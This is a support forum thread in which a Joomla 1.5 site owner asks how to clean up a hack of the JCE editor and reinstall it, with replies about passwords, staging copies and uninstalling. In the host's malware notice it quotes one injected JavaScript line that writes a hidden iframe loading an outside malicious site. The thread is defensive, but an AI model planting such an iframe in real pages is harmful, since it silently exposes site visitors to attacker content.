Hi Nick et al,

My host informed me that there is a security breach and JCE needs an upgrade, but I'm really nervous.

I installed component version 157 and plugin version 154 a few years ago and it crashed one of my sites (just a white page for the homepage), and I couldn't get in the back end, it looked like a half an article page. You know this site now has like 4,000 articles, the latest version is 1.5.26 and I can't upgrade joomla higher without major major headaches.

>> Here's my post two years ago on JCE concerns on the upgrade for my client's site -- has it been that long! see, www.ostraining.com/support-forum/joomla-...ashed-my-site/#12001

The guy who helped revive this site back in 2009 is long gone, and I'm not even sure exactly what he did to bring it back to life.

Apparently his site has a security issue, and I can't wait too long. His host did a temporary fix, which should hold me over for a couple days. Any suggestions?

Oh.. in case you need to know -- the message from the host was Malicious Files Detected, it was in images/stories and... "The malicious code detected is similar to:
Redirects to the following example URL:
document.write('<iframe src="activexscrutiny.org/Lexmark?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

They just said the exploit was JCE Thx.. :) d.

mediamonger wrote:
Hi Mediamonger,

Sorry to hear about that! :( Fixing a hacked Joomla site is a lot of hard work, takes a lot of expertise and experience, and unfortunately there's no simple steps that guarantee a fix without a full evaluation. It's beyond the scope of the support forum, however if you are interested in hiring OSTraining or another developer on fixing it, then let us know. :-) (Contact This email address is being protected from spambots. You need JavaScript enabled to view it. , who has a lot of successful experience fixing hacked sites), or you can contact the recommended developers here: www.ostraining.com/resources/joomla/developers/

One of the first steps you should take after getting hacked and having vulnerabilities in your site is by changing all your passwords, to Joomla backend, FTP, cPanel, and everything.

Check out this tutorial on Joomla Security:
www.ostraining.com/blog/joomla/an-introd...-to-joomla-security/

What to do if your hacked:
www.ostraining.com/blog/how-tos/security/hacked-article/

Aside from this, after getting your site virus free, you should make a copy of your site onto a test site and upgrade JCE to a newer version (For J!1.5) and make sure everything works as it should. :-)

Yes, I did change all of the passwords immediately, but my problem is about the cleanest most efficient way to uninstall and install JCE. Some of the forums say to simply install over the existing JCE, others say to uninstall everything. I'm not sure the best and cleanest way to do this..

mediamonger wrote:
The best way depends on your situation. Since you received vulnerabilities within your JCE and most likely have php hack files in your jce file directories (possibly) masked as image files, it may be best to remove JCE and install it again.

Also, remember to do this on a test site to confirm everything is working as it should.

Hi,
Yes, I am 100% positive -- since I showed it plainly in the code above -- that the hack was in the image file.

Let me rephrase the questions... what is the cleanest way to uninstall extensions generally, not JCE specific... do I uninstall the module last or first or what?

This might help somebody else dealing with my problem. Here's a clean answer about the clean uninstall/install to an older version:
www.joomlacontenteditor.net/forum/jce-ed...57/limit/20/offset/0

Hi mediamonger

Either uninstalling or uploading a new version will work. In both situations the old files will be completely removed.